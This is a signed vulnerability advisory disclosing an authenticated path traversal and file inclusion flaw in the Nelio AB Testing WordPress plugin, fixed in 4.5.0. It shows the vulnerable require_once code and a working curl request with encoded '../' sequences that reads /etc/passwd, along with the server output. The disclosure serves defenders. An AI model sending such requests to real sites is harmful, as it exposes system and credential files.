WordPress plugin nelio-ab-testing path traversal vulnerability

[Henri Salo <henri.salo () nixu com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product: WordPress plugin nelio-ab-testing (Nelio AB Testing)
Product URL:
    https://wordpress.org/plugins/nelio-ab-testing/
    https://nelioabtesting.com/
Vendor: Nelio Software
    http://neliosoftware.com/
    https://profiles.wordpress.org/nelio/

Vulnerability type: Improper Limitation of a Pathname to a Restricted Directory
CWE: https://cwe.mitre.org/data/definitions/22.html
OVE: OVE-20160509-0045
Vulnerable versions: 4.4.4
Fixed version: 4.5.0
Vendor notification: 2016-03-27
Solution date: 2016-04-08
Public disclosure: 2016-05-10

Description of the plugin (from WordPress Plugin Directory):

A/B Testing, conversion rate optimization, and beautiful Heatmaps specifically
designed for WordPress.

Vulnerability details:

The software uses external input to construct a pathname that is intended to
identify a file that is located underneath a restricted parent directory, but
the software does not properly neutralize special elements within the pathname
that causes the pathname to resolve to a location that is outside of the
intended directory.

Risk:

The attacker is able to read the contents of files and expose sensitive data. If
the targeted file is used for a security mechanism, then the attacker is able to
bypass that mechanism.

Affected code:

./nelio-ab-testing/includes/admin/admin-controller.php
527                 public function generate_html_content() {
528                         if ( isset( $_POST['filename'] ) && isset( $_POST['classname'] ) ) {
529                                 $file  = $_POST['filename'];
530                                 $class = $_POST['classname'];
531                                 require_once( $file );
532                                 call_user_func( array ( $class, 'generate_html_content' ) );
533                         }
534                 }

Notes:

Authentication required.

Steps to reproduce:

curl -i -s -k  -X 'POST' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; \
rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1' -H 'Content-Type: \
application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: \
XMLHttpRequest' -b '' --data-binary \
$'action=nelioab_get_html_content&filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&classname=NelioABExperimentsPageController'
 \
'http://wordpress.example.org/wp-admin/admin-ajax.php'
HTTP/1.1 200 OK
Date: Thu, 24 Mar 2016 17:39:06 GMT
Server: Apache/2.4.10 (Debian)
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 1358
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Timeline:
2016-03-27: Reported to vendor.
2016-04-08: Vendor fixes the issue.
2016-05-10: Public disclosure.

- -- 
Henri Salo
Security Specialist, Nixu Oyj
Mobile: +358 40 770 5733
PL 39 FIN (Keilaranta 15)
FIN-02151 Espoo, Finland
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJXMX+PAAoJEHu3+uinl6pabd8QAKZPkdJswdtXgKthn6ndgwxW
3IXzv6ZRlBC/Sf7CyfwY1H/xIUwBXKEOhukwqJqopQTQiWh4gQRfGPgjqF935d4x
FXM4MYoiIqDgj5N1cDbsj3E/SuVI4ux4Yn83gVBbjiuxXVNV4a9Dynn64I4BErj3
gIGOFHtjN7mtrtWoK7NfpF87SeZai5sDtuKrvDmUZMSYHZN+gpAoB+scC/pTyYgR
skiMThtKSJwqd1vg1mVEb0J/cX1a3QRyy8WvLZXzr7GaYwr7zwLhJ6M13MrCdBRV
r/3yE1xOVz8jL7NwEDOhuop65OMMeTROjB6AVfBv0LgS3ghUZBCM8IQAGSVkggAH
ZUswrOYYYXNhdJ+8gcAHNErRn8sNPMJbH1QNRnTCJQv3t6FazutFWQkxkG5B3uvQ
xKWmR72g3m7TFZcvbzXRRE5Kblb8ouUxUY4GW66nqZkSMlfGpqmU2/GvgRgsZbKp
x+qeBliqw1/03Xi70csMr8HE/HrGf7apC93kmr3gYb698thkpQY3iDi+vfD6njn4
weo0NywDvODf8M8smUlSXYY2pYMzqw34Kay/NL0intRjoGpgzjl44C2HxVnAC1tg
DYolXVSI33DVFfUIu+zTeuu3zndf2nDeyoho8yKuSdxJdeA/plxztfv6Eh/altCW
xmi6wOcNKaaf5fgnZw/u
=E1RA
-----END PGP SIGNATURE-----